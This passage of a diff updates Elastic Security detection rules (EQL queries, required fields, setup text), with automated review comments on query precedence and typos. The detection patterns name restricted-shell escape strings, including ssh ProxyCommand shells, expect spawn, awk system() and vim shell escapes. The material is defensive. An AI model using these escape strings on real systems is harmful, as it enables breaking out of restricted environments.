--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_script_via_automator_workflows.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_script_via_automator_workflows.json
@@ -15,6 +15,23 @@
 "references": [
 "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "5d9f8cfc-0d03-443e-a167-2b0597ce0965",
 "severity": "medium",
@@ -43,5 +60,5 @@
 }
 ],
 "type": "eql",
- "version": 1
+ "version": 2
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scripting_osascript_exec_followed_by_netcon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scripting_osascript_exec_followed_by_netcon.json
index 74a70eb7ebd93..3fc89d1e274eb 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scripting_osascript_exec_followed_by_netcon.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scripting_osascript_exec_followed_by_netcon.json
@@ -16,6 +16,33 @@ "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html", "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "47f76567-d58a-4fed-b32b-21f571e28910", "severity": "medium", @@ -39,7 +66,14 @@ { "id": "T1059", "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/" + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.002", + "name": "AppleScript", + "reference": "https://attack.mitre.org/techniques/T1059/002/" + } + ] } ] }, @@ -60,5 +94,5 @@ } ], "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shared_modules_local_sxs_dll.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shared_modules_local_sxs_dll.json index 27fed16285827..f8a0afbe93765 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shared_modules_local_sxs_dll.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shared_modules_local_sxs_dll.json 
@@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution via local SxS Shared Module", - "note": "## Triage and analysis\n\nThe SxS DotLocal folder is a legitimate feature that can be abused to hijack standard modules loading order by forcing an executable on the same application.exe.local folder to load a malicious DLL module from the same directory.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\nThe SxS DotLocal folder is a legitimate feature that can be abused to hijack standard modules loading order by forcing an executable on the same application.exe.local folder to load a malicious DLL module from the same directory.", "query": "file where file.extension : \"dll\" and file.path : \"C:\\\\*\\\\*.exe.local\\\\*.dll\"\n", "references": [ "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection" ], + "required_fields": [ + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } 
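Review bot: The unchanged `file.path : "C:\\*\\*.exe.local\\*.dll"` line sitting next to the rewritten `note` anchors this rule to the `C:` drive, while the PsExec rule touched in this same commit uses `?:\\` drive wildcards; an `<app>.exe.local` redirection folder for an application installed on another volume is therefore never matched, even though the note describes the technique generically. Since the note and `setup` are being revised anyway, either widen the pattern to `?:\\*\\*.exe.local\\*.dll` (bumping `version` again) or add a sentence to the note such as `Only the system (C:) drive is monitored; adjust the path pattern if applications are installed on other volumes.` This is inferred from the query text alone; if the `C:` restriction is deliberate to limit noise, saying so in the note is enough.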
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_evasion_linux_binary.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_evasion_linux_binary.json index 1715625e020b1..5e8c0c31f6bb4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_evasion_linux_binary.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_evasion_linux_binary.json 
@@ -10,8 +10,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the 
system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe session view analysis for the command alerted is avalible in versions 8.2 and above.\n", - "query": "process where event.type == \"start\" and\n\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"nice\") or\n 
(process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", 
\"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0<&2 1>&2\", \"ProxyCommand=;bash 0<&2 1>&2\", \"ProxyCommand=;dash 0<&2 1>&2\", \"ProxyCommand=;/bin/sh 0<&2 1>&2\", \"ProxyCommand=;/bin/bash 0<&2 1>&2\", \"ProxyCommand=;/bin/dash 0<&2 1>&2\")) or\n (process.parent.name in (\"nawk\", \"mawk\", \"awk\", \"gawk\") and process.parent.args : \"BEGIN {system(*)}\")\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - 
Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type == \"start\" and\n\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\")) or\n\n 
/* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn 
sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0<&2 1>&2\", \"ProxyCommand=;bash 0<&2 1>&2\", \"ProxyCommand=;dash 0<&2 1>&2\", \"ProxyCommand=;/bin/sh 0<&2 1>&2\", \"ProxyCommand=;/bin/bash 0<&2 1>&2\", \"ProxyCommand=;/bin/dash 0<&2 1>&2\")) or\n (process.parent.name in (\"nawk\", \"mawk\", \"awk\", \"gawk\") and process.parent.args : \"BEGIN {system(*)}\")\n",
 "references": [
 "https://gtfobins.github.io/gtfobins/apt/",
 "https://gtfobins.github.io/gtfobins/apt-get/",
@@ -39,8 +39,41 @@
 "https://gtfobins.github.io/gtfobins/git/",
 "https://gtfobins.github.io/gtfobins/ftp/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args_count",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "52376a86-ee86-4967-97ae-1a05f55816f0",
+ "setup": "The session view analysis for the command alerted is avalible in versions 8.2 and above.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -76,5 +109,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 1
+ "version": 3
 }
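Review bot: The rewritten `query` fixes `and`/`or` precedence for the nice/cpulimit/find/flock alternatives but leaves the same unparenthesised shape at its outer levels: `process where event.type == "start" and (process.name == "capsh" ...) or (...)`, then `process.name in ("bash", "sh", "dash","ash") and (process.parent.name in (...)) or (process.parent.args in (...) and ...)`, and in the last group `process.args in (...) and (process.parent.name == "crash" ...) or (process.name == "sensible-pager" ...)`. Because EQL gives `and` precedence over `or`, `event.type == "start"` gates only the capsh branch, the shell-name check gates only the byebug/git/ftp/strace branch, and the `process.args` check gates only the crash branch, so every other alternative fires on any event type; wrapping the whole predicate after `event.type == "start" and` in one pair of parentheses and bracketing the `or` alternatives in the two inner groups would make the intended scope explicit, or a `/* */` comment should say the looser scope is deliberate. The carried-over `note` text and the new `setup` string keep the original misspellings (`suspricous`, `MITTRE`, `adviced`, `revelaed`, `crednetials`, `avalible`), and this rewrite of both fields is the natural place to correct them. The `/* nice rule is broken in 8.2 */` comment is kept verbatim; a sentence on what is broken would tell the next maintainer when it can be dropped.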
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_execution_via_apple_scripting.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_execution_via_apple_scripting.json
index 6399e3f2031fd..30498292b8f4b 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_execution_via_apple_scripting.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_shell_execution_via_apple_scripting.json
@@ -16,6 +16,38 @@
 "https://developer.apple.com/library/archive/technotes/tn2065/_index.html",
 "https://objectivebythesea.com/v2/talks/OBTS_v2_Thomas.pdf"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.pid",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "process.pid",
+ "type": "long"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "d461fac0-43e8-49e2-85ea-3a58fe120b4f",
 "severity": "medium",
@@ -44,5 +76,5 @@
 }
 ],
 "type": "eql",
- "version": 3
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_cmd_wmi.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_cmd_wmi.json
index a72c764b3463e..545b525455142 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_cmd_wmi.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_cmd_wmi.json
@@ -12,10 +12,33 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Cmd Execution via WMI",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -43,5 +66,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_image_load_wmi_ms_office.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_image_load_wmi_ms_office.json
index fa82cda9e1620..9fa3761622268 100644
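Review bot: `note` is rewritten to the empty string `"note": ""` rather than removed once its only content (the `## Config` section) moved to the new `setup` field; the same happens in the Suspicious WMI Image Load from MS Office and Suspicious JAVA Child Process hunks below. Unless the rule loader requires the key to be present, an absent `note` is the cleaner representation of "no investigation guide", and consumers that test for key presence rather than content may render an empty guide section. If the empty string is what the rule exporter emits by design, saying so in the description would settle it.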
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_image_load_wmi_ms_office.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_image_load_wmi_ms_office.json
@@ -12,13 +12,41 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious WMI Image Load from MS Office",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "library where process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n event.action : \"load\" and\n event.category : \"library\" and\n dll.name : \"wmiutils.dll\"\n",
+ "note": "",
+ "query": "any where\n (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (dll.name : \"wmiutils.dll\" or file.name : \"wmiutils.dll\")\n",
 "references": [
 "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "dll.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
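Review bot: The rewritten `query` drops the `event.action : "load"` test that the old `library where` form required, so the `event.category == "library"` branch now matches any library-category event for the listed Office processes that names `wmiutils.dll`; if the data source emits library events other than loads for these processes, that widens the rule, so either keep `event.action : "load"` on that branch or state in the rule that the check was dropped deliberately. As a style point, the two `event.category == ...` comparisons are the only exact (`==`) string tests in a predicate that otherwise uses the case-insensitive `:` operator throughout; `event.category : "library"` and `event.category : "process"` would keep the query uniform with its own `event.action : "Image loaded*"` and `dll.name :` tests. The new `required_fields` list does cover every field the query references.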
@@ -46,5 +74,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_jar_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_jar_child_process.json
index 6a124ad3b5f94..ef48f78069e34 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_jar_child_process.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_jar_child_process.json
@@ -11,15 +11,33 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious JAVA Child Process",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"java\" and\n process.name : (\"sh\", \"bash\", \"dash\", \"ksh\", \"tcsh\", \"zsh\", \"curl\", \"wget\")\n",
 "references": [
 "https://www.lunasec.io/docs/blog/log4j-zero-day/",
 "https://github.com/christophetd/log4shell-vulnerable-app",
 "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -55,5 +73,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_java_netcon_childproc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_java_netcon_childproc.json
index 38a9a6ebf47e7..37a39cbd07f43 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_java_netcon_childproc.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_java_netcon_childproc.json
@@ -17,6 +17,48 @@
 "https://github.com/christophetd/log4shell-vulnerable-app",
 "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.port",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.pid",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "process.pid",
+ "type": "long"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "c3f5e1d8-910e-43b4-8d44-d748e498ca86",
 "severity": "high",
@@ -58,5 +100,5 @@
 }
 ],
 "type": "eql",
- "version": 2
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_pdf_reader.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_pdf_reader.json
index 3264382e5476c..74207b94231de 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_pdf_reader.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_pdf_reader.json
